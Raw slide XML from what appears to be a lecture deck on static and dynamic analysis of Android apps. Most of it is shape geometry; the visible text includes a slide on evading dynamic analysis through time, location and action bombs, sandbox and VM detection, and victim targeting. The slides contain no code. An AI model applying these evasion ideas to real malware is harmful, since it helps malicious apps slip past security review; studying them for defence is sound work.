                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 82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7648" h="825038">
                  <a:moveTo>
                    <a:pt x="42588" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="506602" y="2"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="740755" y="2"/>
                    <a:pt x="1277648" y="184693"/>
                    <a:pt x="1277648" y="412520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1277648" y="640347"/>
                    <a:pt x="740755" y="825038"/>
                    <a:pt x="506602" y="825038"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42585" y="825036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-10810" y="550025"/>
                    <a:pt x="-17482" y="248315"/>
                    <a:pt x="42588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2000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="51000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="32000"/>
                  </a:schemeClr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>
              <a:glow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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1559530" y="3498729"/>
              <a:ext cx="480561" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 110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561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3003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glow rad="50800">
                <a:schemeClr val="bg1"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ored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1719578" y="2447169"/>
              <a:ext cx="160460" cy="825038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3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426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6" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:pattFill prst="narVert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ored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1719578" y="2447168"/>
              <a:ext cx="160460" cy="825038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3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426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6" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="94000">
                  <a:srgbClr val="1D1D1D">
                    <a:alpha val="16000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="5000">
                  <a:srgbClr val="131313">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="262626"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                    <a:alpha val="93000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="5900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395226" y="2754879"/>
              <a:ext cx="809164" cy="33019"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 2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4799" h="24102">
                  <a:moveTo>
                    <a:pt x="0" y="24102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140163" y="7416"/>
                    <a:pt x="266842" y="0"/>
                    <a:pt x="404308" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541774" y="0"/>
                    <a:pt x="824799" y="24102"/>
                    <a:pt x="824799" y="2410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"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1629368" y="3498729"/>
              <a:ext cx="340880" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 110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561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="300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50500">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="19000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="27000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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670317" y="3716795"/>
              <a:ext cx="258982" cy="601579"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29055"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="80000"/>
              </a:schemeClr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extrusionH="76200" contourW="38100">
              <a:bevelT w="139700" h="139700" prst="divot"/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tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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649" y="1026018"/>
              <a:ext cx="2198318" cy="227805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708069" y="1180060"/>
              <a:ext cx="2185416" cy="173011"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="49000">
                  <a:srgbClr val="232323"/>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="dk1">
                    <a:satMod val="103000"/>
                    <a:lumMod val="102000"/>
                    <a:tint val="94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/>
            <a:effectLst>
              <a:outerShdw dist="12700" dir="5400000" algn="t" rotWithShape="0">
                <a:schemeClr val="bg1">
                  <a:alpha val="40000"/>
                </a:scheme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45720" rtlCol="0" anchor="ctr">
              <a:sp3d extrusionH="6350">
                <a:contourClr>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:contourClr>
              </a:sp3d>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1" smtClean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Helvetica Neue Condensed" charset="0"/>
                  <a:ea typeface="Helvetica Neue Condensed" charset="0"/>
                  <a:cs typeface="Helvetica Neue Condensed" charset="0"/>
                </a:rPr>
                <a:t>Uber</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean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Helvetica Neue Condensed" charset="0"/>
                  <a:ea typeface="Helvetica Neue Condensed" charset="0"/>
                  <a:cs typeface="Helvetica Neue Condensed" charset="0"/>
                </a:rPr>
                <a:t> Flashlight</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1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 Neue Condensed" charset="0"/>
                <a:ea typeface="Helvetica Neue Condensed" charset="0"/>
                <a:cs typeface="Helvetica Neue Condensed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Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Automated User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7073" y="3402668"/>
            <a:ext cx="3231741" cy="1145526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Trapezoid 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="826873" y="1797888"/>
            <a:ext cx="1566316" cy="1141154"/>
          </a:xfrm>
          <a:prstGeom prst="trapezoid">
            <a:avLst>
              <a:gd name="adj" fmla="val 23881"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="59000">
                <a:schemeClr val="bg1">
                  <a:alpha val="74000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="41000">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="74000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="39000">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="67000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="61000">
                <a:schemeClr val="bg1">
                  <a:alpha val="67000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="9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8751" y="1799679"/>
            <a:ext cx="1757270" cy="99466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487203" y="3762283"/>
            <a:ext cx="216458" cy="260072"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2699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 w="50800" h="139700" prst="divot"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:extrusionClr>
            <a:contourClr>
              <a:schemeClr val="tx1">
                <a:lumMod val="85000"/>
                <a:lumOff val="1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516493" y="1318141"/>
            <a:ext cx="3627507" cy="130376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61963" indent="-236538"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Identification techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="461963" indent="-236538">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Network activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="461963" indent="-236538">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ebugging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="461963" indent="-236538">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty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nstrumentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="461963" indent="-236538">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tc.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2340451" y="3723518"/>
            <a:ext cx="1406622" cy="5056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86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2.22222E-6 0.0307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8" grpId="0" animBg="1"/>
      <p:bldP spid="10" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="22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Evading Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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Make sure the malicious code is not executed during the analysis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Time bombs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Location bombs, IP bombs, etc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Action-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bombs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sandbox detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is the contact list full and “real”?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same for meetings, emails, accounts, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Am I running in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VM?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Targeted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attacks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0278" y="-1967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Static Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>: The Automated Code Auditor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539" y="1144929"/>
            <a:ext cx="3363191" cy="1485104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="7F7F7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073" y="2581003"/>
            <a:ext cx="3922476" cy="1648121"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="7F7F7F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4552688" y="3592004"/>
            <a:ext cx="4217883" cy="75282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Static analysis unpacks the app and analyses its code &amp; resources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2" name="Picture 21" descr="Nexus 6Blan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06" y="1211658"/>
            <a:ext cx="2014690" cy="373542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22546" y="1551633"/>
            <a:ext cx="1744670" cy="3097540"/>
            <a:chOff x="700649" y="1026018"/>
            <a:chExt cx="2198318" cy="3902962"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="700649" y="1026018"/>
              <a:ext cx="2198318" cy="39029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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1165996" y="2682671"/>
              <a:ext cx="1267623" cy="825036"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
